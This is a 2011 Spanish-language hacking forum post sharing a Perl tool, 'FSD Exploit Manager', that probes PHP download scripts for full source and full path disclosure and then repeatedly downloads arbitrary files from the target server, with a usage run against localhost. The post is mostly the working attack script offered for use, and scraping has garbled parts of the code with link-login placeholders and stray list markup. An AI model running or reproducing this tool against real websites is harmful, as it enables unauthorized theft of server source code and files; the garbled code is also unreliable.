[Perl] FSD Exploit Manager

  • 0 Respuestas
  • 1288 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl] FSD Exploit Manager

  • en: Julio 03, 2011, 10:03:29 pm
Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma
muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada
por el programa mismo.
Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar
archivos.

Código: Perl
  1. #!usr/bin/perl
  2. #FSD Exploit Manager (C) Doddy Hackman 2011
  3.  
  4. use LWP::UserAgent;
  5. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  6. use File::Basename;
  7.  
  8. my $nave = LWP::UserAgent->new;
  9. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  10. $nave->timeout(5);
  11.  
  12. $SIG{INT} = \&adios;
  13.  
  14. head();
  15. if($ARGV[0]) {
  16. ver($ARGV[0]);
  17. } else {
  18. sintax();
  19. }
  20. copyright();
  21.  
  22. sub ver {
  23.  
  24. my $page = You are not allowed to view links. Register or Login;
  25. You are not allowed to view links. Register or Login "\n<ul class="bbc_list"><li type="square"> Target : ".$page."\n\n";[/li][/list]
  26.  
  27. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  28.  
  29. if ($path=~/\/(.*)$/) {
  30. my $me = $1;
  31. $code1 = toma($page.$me);
  32. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  33. You are not allowed to view links. Register or Login "</li><li type="square"> Full Source Discloure Detect\a\n";[/li][/list]
  34. $code2 = toma($page."'");
  35. if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
  36. You are not allowed to view links. Register or Login "\n</li><li type="square"> Full Path Dislocure Detect : ".$1."\n";[/li][/list]
  37. }
  38. installer();
  39. while(1) {
  40. You are not allowed to view links. Register or Login "\n\nurl>";
  41. $SIG{INT} = \&adios;
  42. You are not allowed to view links. Register or Login(my $url = <stdin>);
  43. if (download($page.$url,"fsdlogs/".basename($url))) {
  44. You are not allowed to view links. Register or Login "\n\n</li><li type="square"> File Downloaded\n";[/li][/list]
  45. You are not allowed to view links. Register or Login("start fsdlogs/".basename($url));
  46. }
  47. }
  48. } else {
  49. You are not allowed to view links. Register or Login "[-] Web not vulnerable\n\n";
  50. }
  51. }
  52. }
  53.  
  54. sub adios {
  55. You are not allowed to view links. Register or Login "\n\n</li><li type="square"> Good Bye\n";[/li][/list]
  56. copyright();
  57. }
  58.  
  59. sub head {
  60. You are not allowed to view links. Register or Login "\n\n-- == FSD Exploit Manager == --\n\n";
  61. }
  62.  
  63. sub copyright {
  64. You are not allowed to view links. Register or Login "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
  65. You are not allowed to view links. Register or Login(1);
  66. }
  67.  
  68. sub sintax {
  69. You are not allowed to view links. Register or Login "\n</li><li type="square"> Sintax : $0 <page>\n";[/li][/list]
  70. }
  71.  
  72. sub toma {
  73. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  74. }
  75.  
  76. sub download {
  77. if ($nave->mirror($_[0],$_[1])) {
  78. if (-f $_[1]) {
  79. You are not allowed to view links. Register or Login true;
  80. }}}
  81.  
  82. sub installer {
  83. unless (-d "fsdlogs/") {
  84. You are not allowed to view links. Register or Login("fsdlogs/","777");
  85. }}
  86.  
  87. # ¿ The End ?
  88.  


Un ejemplo de uso

Código: You are not allowed to view links. Register or Login
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


  • Target : http://localhost/down.php?down=[/li]

  • Full Source Discloure Detect[/li]

  • Full Path Dislocure Detect : C:\xampp\htdocs\down.php[/li][/list]


    url>c:/aca.txt


  • File Downloaded[/li][/list]


    url>c:/aca.txt


  • File Downloaded[/li]


  • Good Bye[/li][/list]


    -- == (C) Doddy Hackman 2011 == --


  • « Última modificación: Julio 17, 2011, 03:41:27 am por Sthefano02 »

     

    Tutorial perl desde cero By: Black Poision & Painboy

    Iniciado por ProcessKill

    Respuestas: 2
    Vistas: 5223
    Último mensaje Septiembre 02, 2011, 09:43:36 pm
    por blozzter
    [Perl] Verificando si es root para correr un script

    Iniciado por c1st

    Respuestas: 1
    Vistas: 3436
    Último mensaje Octubre 07, 2012, 06:01:39 pm
    por ANTRAX
    [Perl] Half Life Servers List 0.1

    Iniciado por BigBear

    Respuestas: 0
    Vistas: 2581
    Último mensaje Noviembre 12, 2012, 07:31:50 pm
    por BigBear
    [Perl] Search in google for scan SQLI

    Iniciado por BigBear

    Respuestas: 0
    Vistas: 2572
    Último mensaje Julio 03, 2011, 09:49:49 pm
    por BigBear
    [Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

    Iniciado por tar3kw0rm3d

    Respuestas: 0
    Vistas: 2971
    Último mensaje Junio 02, 2013, 08:01:28 pm
    por tar3kw0rm3d